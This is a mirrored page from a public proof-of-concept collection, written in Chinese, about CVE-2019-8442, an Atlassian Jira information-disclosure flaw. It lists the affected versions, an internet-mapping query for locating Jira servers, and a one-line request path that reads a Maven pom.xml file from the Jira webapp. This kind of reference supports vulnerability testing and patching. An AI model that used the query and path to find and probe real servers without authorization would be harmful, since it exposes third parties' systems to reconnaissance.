admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

33 lines
670 B
Markdown
Raw Blame History

# Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442
## 漏洞描述
Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 远程攻击者可利用该漏洞访问Jira webroot中的文件。
## 漏洞影响
```
Atlassian Jira < 7.13.4
Atlassian Jira 8.00-8.0.4
Atlassian Jira 8.1.0-8.1.1
```
## 网络测绘
```
app="ATLASSIAN-JIRA"
```
## 漏洞复现
登录页面
![](images/202205241425263.png)
验证POC
```
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
```
![](images/202205241425438.png)
Reference in New Issue View Git Blame Copy Permalink